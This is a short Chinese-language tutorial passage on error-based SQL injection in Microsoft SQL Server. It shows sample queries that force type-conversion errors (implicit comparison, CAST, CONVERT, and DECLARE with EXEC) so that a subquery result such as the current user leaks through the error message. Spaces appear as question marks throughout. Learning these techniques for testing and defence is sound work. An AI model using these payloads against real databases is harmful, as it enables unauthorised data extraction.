SQL Server从0到1——报错注入

报错注入分为三类：隐式转换，和显示转换，declare函数 隐式转换：

原理：将不同数据类型的数据进行转换或对比
select?*?from?test.dbo.users?where?(select?user)>0??#对比
select?*?from?test.dbo.users?where?((select?user)/1)=1?#运算

?

显示转换：

原理：
依靠：CAST，DECLARE和CONVERT函数进行数据类型转，当如果转化的是有关查询语句的结果，那么就会触发报错，但注意只能爆一个字符串
select?'naihe567'?as?name,'567'?as?num)as??b#这里我们使用了select?创建了一个自定义的临时表方便观察
select?cast((select?name?from?(select?'naihe567'?as?name,'567'?as?num)as??b)?as?int)?#cast函数
select?convert(int,(select?name?from?(select?'naihe567'?as?name,'567'?as??num)as?b))?#convert函数
declare?@s?varchar(2000)?set?@s='select?naihe567'?exec(@s)?#declare

?